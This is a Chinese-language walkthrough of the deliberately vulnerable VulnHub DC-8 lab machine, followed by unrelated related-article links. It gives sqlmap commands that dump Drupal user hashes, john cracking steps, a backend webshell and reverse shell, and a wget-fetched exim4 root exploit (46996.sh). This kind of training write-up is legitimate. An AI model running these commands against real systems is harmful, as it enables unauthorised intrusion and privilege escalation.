vulnhub DC系列 DC-8
总结:exim4提权
目录
下载地址
漏洞分析
信息收集
网站爆破
后台webshell
提权
下载地址
- DC-8.zip (Size: 379 MB)
- Download: http://www.five86.com/downloads/DC-8.zip
- Download (Mirror): https://download.vulnhub.com/dc/DC-8.zip
使用方法:解压后,使用vm直接打开ova文件。
漏洞分析
信息收集
这里还是使用DC-1的方法
1.给靶机设置一个快照
2.fping -agq 192.168.1.0/24 使用fping快速扫描该网段中存活的机子
3.将靶机关闭重新扫描一下,对比少的那个ip就是靶机的ip
4.使用快照快速将靶机恢复
注:ip段要看自己的
老样子我们去查看80端口,去查看关于这网页的漏洞
这里我们去查看一下他的网站指纹。
drupal 7是有一个漏洞,我们尝试一下,但是失败了,接下来我们继续查看网页,
这里我们发现一个nid参数,我们尝试sqlmap试试
网站爆破
//注意我们要看自己的ip
sqlmap -u "http://192.168.1.15/?nid=1" --dbs --batch
这里我们查看d7db库,users表,user和pass字段
sqlmap -u "http://192.168.1.15/?nid=1" -D "d7db" -tables --dbs --batch
sqlmap -u "http://192.168.1.15/?nid=1" -D "d7db" -T "users" --columns --dbs --batch
sqlmap -u "http://192.168.1.15/?nid=1" -D "d7db" -T "users" -C "name","pass" --dump --dbs --batch
这里我们去爆破这两个密码。
然后这里我解释一下下面为什么要加\,因为在linux中$这是一个变量符号,列如下面$S其实kali理解就是一个变量,然后我们是没有定义这一个变量的所以是空,所以我们要使用\将$转义,让$只是当做一个字符串处理。
//将加密密码写到一个文件
echo "\$S\$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z" > 1.txt
echo "\$S\$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF" >> 1.txt//使用john解密
john 1.txt
这里爆破的十分的快,这里我们看看是admin的密码还是john的密码。
这里我们使用dirsearch爆破目录,发现/user/login可以登录,然后在robots.txt
//这两个都能登录
网址+/user/login
网址+/?q=user/login/
后台webshell
这里寻找了很久,终于是找到可以利用的地方了。
这里我们使用ls来测试一下,然后往下保存
然后回去我们随便填。
这里我们发现是可以执行的,接下来我们尝试反弹shell回来。
这里保存的时候就直接把shell反弹回来了。
提权
这里还是先使用,python来搞一个伪shell,还是挺好用的
python -c "import pty;pty.spawn('/bin/bash')"
然后接下来想着怎么提权,找了半天没有什么东西,然后查看内核也没怎么找到什么有用的东西,接下来我们查看suid提权。
find / -perm /4000 2>/dev/null
这里发现了不少陌生的命令。
这里看看别人的知道,使用exim4提权了,接下来我们看看,这里先使用searchsploit来搜索相关漏洞。
//我们查看一下
searchsploit -x linux/local/46996.sh
我们创建网站,然后这里我们可以使用wget上传,这里有两种方法可以使用
1.可以使用python创建临时网站
2.使用Apache之类的
因为我们这里有apache就不使用python了。
//将exp直接复制到,网站根目录下面
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /var/www/html/1.sh
//这里我们来到/tmp目录下面,因为其他目录通常会没有权限
//然后wget下载,这里要看自己的ip和文件名
wget http://192.168.1.12/1.sh//给权限
chmod 777 1.sh
但是这里还是不行,经过查看,发现还有第二种使用方法
./1.sh -m netcat
然后在5秒后输入
python -c "import pty;pty.spawn('/bin/bash')"
他就会直接跳转到root
注意这个是有时间限制的
vulnhub DC系列 DC-8相关推荐
- Vulnhub靶机DC系列-DC-8
Vulnhub靶机DC系列-DC-8 靶场名称:DC-8 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ 下载地址: DC-8.zip (Size: 379 ...
- DC系列:1 (DC-1靶机,初级渗透详细教程)
DC-1靶机渗透 环境搭建 详情 描述 使用工具 一:信息收集 基础信息查询 0x01 查看存活主机 0x02 查看开放端口 0x03 查看端口服务 0x04 扫描网站根目录及指纹信息 0x05 访问 ...
- DC系列漏洞靶场-渗透测试学习复现(DC-1)
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场:DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们 ...
- 【CyberSecurityLearning 74】DC系列之DC-5渗透测试
目录 DC系列之DC-5渗透测试 实验环境: 实验步骤: 1.主机扫描,确定目标主机IP 2.对DC-5进行端口扫描 3.访问DC-5的web服务,了解相关信息 4.使用wfuzz测试页面参数 5.看 ...
- DC系列靶机DC-1
1,主机发现 1),nmap -sP 192.168.44.0/24 对当前网段内存活的主机进行扫描. 2),主机发现也可以使用 netdiscover -i eth0 -r 192.168.44.0 ...
- 新能源汽车6kw充电机,DC to DC双向升降压48~54VDC输入,输出320VDC,双向可以输入
新能源汽车6kw充电机,DC to DC双向升降压48-54VDC输入,输出320VDC,双向可以输入,输出. MCU TMS320C2 系列TI DSP高性能芯片 PI 2SC0435T方案,驱动英 ...
- VulnHub靶场系列:Flick
VulnHub靶场系列:Flick 今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来. 环境部署: 下载靶场并导入到VMware中: https: ...
- 干货 | 带你解锁AC/DC、DC/DC转换器基础
首先,我们过一下AC(交流)和DC(直流)的概念. 何谓AC Alternating Current(交流)的首字母缩写. AC是大小和极性(方向)随时间呈周期性变化的电流. 电流极性在1秒内的变化次 ...
- SC8701 120W DC TO DC 电源模块的设计
SC8701 120W DC TO DC 电源模块的设计 sc8701是一款同步4开关的buck-boost控制器,支持2.7~36V宽压输入,和2~36V输出,支持输入限流,输出限流,过温等保护功能 ...
- AC/DC、DC/DC转换器知识
首先,我们过一下AC(交流)和DC(直流)的概念. 何谓AC Alternating Current(交流)的首字母缩写. AC是大小和极性(方向)随时间呈周期性变化的电流. 电流极性在1秒内的变化次 ...
最新文章
- java.lang.IllegalStateException: Context namespace element ‘annotation-config’ and its parser class
- 质量意味着在没有人看的时候把它做对
- 怎样修改云钱宝的实名认证_和平精英实名认证怎么修改 灵敏度怎么设置
- web页面刷不出来 白色_今日头条连接超时刷不出来解决方案
- word2010添加b5纸张大小_纸张幅面规格尺寸你了解吗?
- 跟我学PHP第二篇- 配置Mysql以及PHP WampServer篇(1)
- 全国携号转网下月底实现 三大运营商狂推多种优惠套餐
- 用好pypi,提高开发速度
- 【免费】某平台3980元大数据课程免费下载,仅此1次
- vim下中文乱码问题解决办法
- 已经通过CMMI/CMM3级评估的企业名单
- Microsoft visual Studio 2010 下 DirectX SDK 安装配置详细过程
- python 简历处理_利用python处理简历和名单——处理excel os、shutil处理文件
- 蚂蚁金服区块链已开出近60万张医疗电子票据,市民报销看病更方便!
- 常见登录密码加密方式
- Linux六种进程状态R、S、D、T、Z、X
- CLIP(Learning Transferable Visual Models From Natural Language Supervision)
- 安卓在将来的发展趋势
- Zhong__交换机各种情况下端口快速启动方法
- eclipse右键之后卡死
热门文章
- AI社区炸锅了!一句话哄一哄就能让GPT-3准确率暴涨61%!
- 一图讲清:如何将招聘管理流程化,让HR从重复工作中解放出来
- 电脑怎么进行录屏呢?这些方法了解过吗
- 微型计算机实现,微型计算机动画实现技术.pdf
- Java 通用代码生成器光 2.3.0 文明 Beta10 版发布介绍视频,支持从源码构建
- 唱吧导出的是php,唱吧黑科技:一键修音功能到底有多强大!居然连Rap都能修!...
- 【软件测试】软件本地化测试
- macBook安装WIN10后,无法识别硬盘,也没有任何驱动
- Free BASIC 试用(从Qbasic发展上来,现在支持64位程序开发)
- 如何用html调用网页中的视频,如何将网页视频播放器调用换成西瓜影音 西瓜影音网页调用说明以及网页调用代码...